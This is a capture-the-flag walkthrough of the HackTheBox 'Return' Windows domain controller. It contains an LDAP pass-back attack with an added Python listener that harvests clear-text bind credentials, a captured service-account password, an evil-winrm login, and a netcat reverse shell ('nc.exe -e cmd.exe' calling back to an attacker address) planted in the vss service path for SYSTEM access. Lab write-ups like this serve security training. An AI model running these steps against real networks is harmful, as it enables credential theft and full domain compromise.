
Enumeration

╭─tahaafarooq at urchinsec in ~/Desktop/hackthebox/machines/return
╰─○ nmap -A 10.129.95.241 -oN nmap-scan
Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-07 12:24 EAT
Nmap scan report for 10.129.95.241
Host is up (0.16s latency).
Not shown: 987 closed ports
PORT      STATE    SERVICE       VERSION
53/tcp    open     domain?
80/tcp    open     http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-07 09:44:18Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
49154/tcp filtered unknown
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 18m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-07T09:46:43
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 322.67 seconds

Several ports are open. Port 80 serves an IIS site titled "HTB Printer Admin Panel", while 53, 88, 389, 445 and 3268 together with the LDAP domain return.local show that the host is actually a domain controller, not a printer. Two details from the scan matter later: SMB message signing is required, so relaying NTLM to this host is not an option, and the 18m34s clock skew is well past the 5-minute Kerberos tolerance, so any Kerberos tooling will need the local clock synced to the DC first.


Foothold

First, I visit the site on port 80:


The Settings page (http://return.htb/settings.php) shows the printer's LDAP configuration, including a server address of printer.return.local, so I add that hostname to my /etc/hosts file.

The same page also gives us a username: svc-printer.

The settings page lets an administrator change the LDAP/AD server the printer queries for its user list. The printer authenticates to whatever server is configured using the stored svc-printer password, so if I point the server address at my own machine and listen on port 389, the printer will send that bind, credentials included, straight to me (a classic LDAP pass-back attack):


╰─○ sudo nc -lvnp 389
Listening on 0.0.0.0 389
Connection received on 10.129.95.241 49570
0*`%return\svc-printer�
                       1edFg43012!!
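As an added illustration (not part of the original writeup), the following Python script does what netcat did above but decodes the bytes properly: it parses the LDAP simple BindRequest the printer sends and returns the bind name and password. To run offline it also re-encodes a sample bind built from the account name and password shown on this page; the listener function is only invoked when the script is executed directly and needs root to bind port 389.

```python
#!/usr/bin/env python3
"""Decode the LDAP simple BindRequest caught by a pass-back listener.

Added example, not code from the original writeup. The stray characters netcat
printed ("0*`%...") are the BER tag/length bytes of the BindRequest.
"""
from __future__ import annotations

import socket
from dataclasses import dataclass

# BER tags in an LDAPMessage carrying a BindRequest (RFC 4511, section 4.2)
TAG_SEQUENCE = 0x30       # LDAPMessage
TAG_INTEGER = 0x02        # messageID, version
TAG_OCTET_STRING = 0x04   # bind name
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0] BindRequest
TAG_SIMPLE_AUTH = 0x80    # [CONTEXT 0] simple password, sent in clear text


def _read_tlv(buf: bytes, pos: int) -> tuple[int, bytes, int]:
    """Return (tag, value, next_pos) for the BER element at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length, up to 4 bytes
        n = length & 0x7F
        if n == 0 or n > 4:
            raise ValueError("unsupported BER length encoding")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated BER element")
    return tag, value, pos + length


@dataclass
class BindRequest:
    message_id: int
    version: int
    name: str
    password: str


def parse_bind_request(data: bytes) -> BindRequest:
    """Decode one LDAPMessage and extract a simple-auth BindRequest."""
    tag, body, _ = _read_tlv(data, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an LDAPMessage")
    tag, msg_id, pos = _read_tlv(body, 0)
    if tag != TAG_INTEGER:
        raise ValueError("missing messageID")
    tag, bind, _ = _read_tlv(body, pos)
    if tag != TAG_BIND_REQUEST:
        raise ValueError(f"protocolOp is not a BindRequest (tag 0x{tag:02x})")
    tag_v, version, pos = _read_tlv(bind, 0)
    tag_n, name, pos = _read_tlv(bind, pos)
    tag_a, auth, _ = _read_tlv(bind, pos)
    if tag_v != TAG_INTEGER or tag_n != TAG_OCTET_STRING:
        raise ValueError("malformed BindRequest")
    if tag_a != TAG_SIMPLE_AUTH:
        # A SASL bind ([3]) carries no clear-text password: nothing to harvest.
        raise ValueError(f"not a simple bind (authentication tag 0x{tag_a:02x})")
    return BindRequest(
        message_id=int.from_bytes(msg_id, "big"),
        version=int.from_bytes(version, "big"),
        name=name.decode("utf-8", "replace"),
        password=auth.decode("utf-8", "replace"),
    )


def _tlv(tag: int, value: bytes) -> bytes:
    """BER-encode one element with a short-form length (value < 128 bytes)."""
    if len(value) >= 128:
        raise ValueError("short-form length only")
    return bytes([tag, len(value)]) + value


def build_bind_request(name: str, password: str, message_id: int = 1) -> bytes:
    """Encode a simple BindRequest; used here only to construct test traffic."""
    bind = (_tlv(TAG_INTEGER, b"\x03")
            + _tlv(TAG_OCTET_STRING, name.encode())
            + _tlv(TAG_SIMPLE_AUTH, password.encode()))
    return _tlv(TAG_SEQUENCE,
                _tlv(TAG_INTEGER, bytes([message_id])) + _tlv(TAG_BIND_REQUEST, bind))


# Constructed sample: the bind the printer sent, rebuilt from the account name
# and password in this writeup. Its bytes start "0*" and "`%" (0x30 0x2a, 0x60
# 0x25), the same stray characters netcat showed above.
SAMPLE_BIND = build_bind_request("return\\svc-printer", "1edFg43012!!")


def serve_once(port: int = 389) -> BindRequest:
    """Accept one connection, decode its first BindRequest, print the creds.

    Binding port 389 needs root (or CAP_NET_BIND_SERVICE). Not run on import.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(4096)
    req = parse_bind_request(data)
    print(f"[{peer[0]}] bind name={req.name!r} password={req.password!r}")
    return req


if __name__ == "__main__":
    serve_once()
```

Run it with sudo in place of the netcat listener, then change the server address in the printer settings as above; the script prints the decoded name and password and exits. Because it rejects anything that is not a simple bind, it also makes the defensive point concrete: had the printer used LDAPS or a SASL bind, there would be no clear-text password to take.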

The unprintable characters around the strings are the BER tag and length bytes of an LDAP simple BindRequest; the bind name return\svc-printer and the password 1edFg43012!! follow in clear text, which is exactly why a simple bind over plain LDAP (rather than LDAPS or a SASL bind) is so dangerous. With the password in hand, I use evil-winrm to try for a shell with these credentials:

╰─○ evil-winrm -i 10.129.95.241 -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer

Privilege Escalation

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

Nothing in that list gives an instant win on its own (SeBackupPrivilege and SeRestorePrivilege are interesting, but there is a quicker route), so I checked the account's group memberships, hoping for Administrators. It turned out differently:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 12:15:13 AM
Password expires             Never
Password changeable          5/27/2021 12:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/26/2021 12:39:29 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.

So svc-printer is a member of Server Operators: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-serveroperators

That makes a SYSTEM shell straightforward. Members of Server Operators on a domain controller can start, stop and reconfigure services, and the Volume Shadow Copy service (vss) runs as LocalSystem. If I change its binary path to a netcat reverse shell and restart it, the Service Control Manager will launch my payload as NT AUTHORITY\SYSTEM. sc.exe is the Windows service control tool, roughly what systemctl is on Linux. First I start a listener on my machine on port 1234 (nc -lvnp 1234), then upload netcat using evil-winrm's built-in upload:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload nc.exe
Info: Uploading nc.exe to C:\Users\svc-printer\Documents\nc.exe

                                                             
Data: 51488 bytes of 51488 bytes copied

Info: Upload successful!

Now for the good part: reconfiguring the service. Before changing it, record the original binary path with sc.exe qc vss so the service can be restored afterwards. Then point binPath at the uploaded netcat:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.15 1234"
[SC] ChangeServiceConfig SUCCESS

Stop the service if it is running (sc.exe stop vss), then start it again (sc.exe start vss). Starting it makes the Service Control Manager execute our netcat command line as the service binary, which connects back to the listener. Expect sc.exe to complain that the service did not respond in time, because nc.exe never reports back to the SCM; the reverse shell has already connected by then, but it may be short-lived once the SCM gives up on the service, so act quickly. Once done, restore the binPath recorded earlier with another sc.exe config so the box is left working.


The listener now receives a shell running as NT AUTHORITY\SYSTEM, the account the VSS service runs under, which has full access to the Administrator profile.

The user flag (user.txt) is on svc-printer's Desktop, and root.txt is on the Administrator's Desktop.
